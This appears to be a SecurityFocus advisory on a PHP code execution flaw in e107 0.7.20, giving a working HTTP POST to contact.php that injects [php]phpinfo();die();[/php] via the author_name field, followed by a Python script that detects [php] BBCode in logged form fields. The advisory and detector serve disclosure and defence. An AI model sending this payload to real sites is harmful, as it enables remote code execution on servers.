e107 BBCode Arbitrary PHP Code Execution Vulnerability

Attackers can exploit this issue using a browser.

The following example is available:

POST /contact.php HTTP/1.1
Host: www.example.com
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]&
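
A detection check for the request above, as an added example that is not part of the original advisory: it flags any form field whose percent-decoded value contains a [php] BBCode tag, generalizing from author_name to every field. Apart from the first request body, which is the one shown above, the sample requests and the field names body and subject are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Opening [php] BBCode tag, case-insensitive, tolerating padding spaces.
PHP_TAG = re.compile(r"\[\s*php\s*\]", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # assumption: enough to undo re-encoding added by log pipelines

def fully_decode(value):
    """Percent-decode repeatedly so a re-encoded %255Bphp%255D is seen as [php]."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_php_bbcode(body):
    """Return sorted names of form fields whose value contains a [php] tag."""
    hits = set()
    # parse_qsl performs the first round of percent-decoding itself.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if PHP_TAG.search(fully_decode(value)):
            hits.add(name)
    return sorted(hits)

def scan(requests):
    """Return (path, field names) for each logged request carrying a [php] tag."""
    findings = []
    for path, body in requests:
        fields = find_php_bbcode(body)
        if fields:
            findings.append((path, fields))
    return findings

# Constructed sample input; only the first body is taken from the page.
SAMPLE_REQUESTS = [
    ("/contact.php", "send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]&"),
    ("/contact.php", "send-contactus=1&author_name=Alice&body=How+do+I+install+php%3F"),
    ("/contact.php", "send-contactus=1&subject=hi&body=%255BPHP%255D+test"),
]

if __name__ == "__main__":
    for path, fields in scan(SAMPLE_REQUESTS):
        print(f"ALERT {path}: [php] BBCode in field(s) {', '.join(fields)}")
```
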

The following exploit is also available:


 

Copyright 2010, SecurityFocus